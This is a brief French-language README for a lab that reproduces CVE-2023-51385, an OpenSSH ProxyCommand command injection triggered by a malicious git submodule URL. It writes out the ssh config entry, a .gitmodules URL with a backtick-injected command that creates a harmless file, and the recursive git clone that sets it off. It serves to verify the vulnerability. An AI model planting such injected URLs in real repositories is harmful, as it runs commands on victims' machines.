
Laboratoire de reproduction pour CVE-2023-51385 : injection de commande dans OpenSSH ProxyCommand via des URL de sous-modules git malveillantes. Guide pas à pas pour vérifier la vulnérabilité.
Tout d'abord, vous devez ajouter le contenu suivant à ~/.ssh/config
host *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
L'instruction du fichier .gitmodules contient une injection de commande
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar
Une fois la configuration terminée, exécutez la commande suivante pour déclencher l'exploitation
git clone https://github.com/LtmThink/CVE-2023-51385_test --recurse-submodules
Si l'exécution réussit, un fichier cve.txt sera généré dans le répertoire CVE-2023-51385_test

Remarque : OpenSSH doit être <9.6p1
Pour plus de détails, voir ce blog :
"# cve-2023-51385"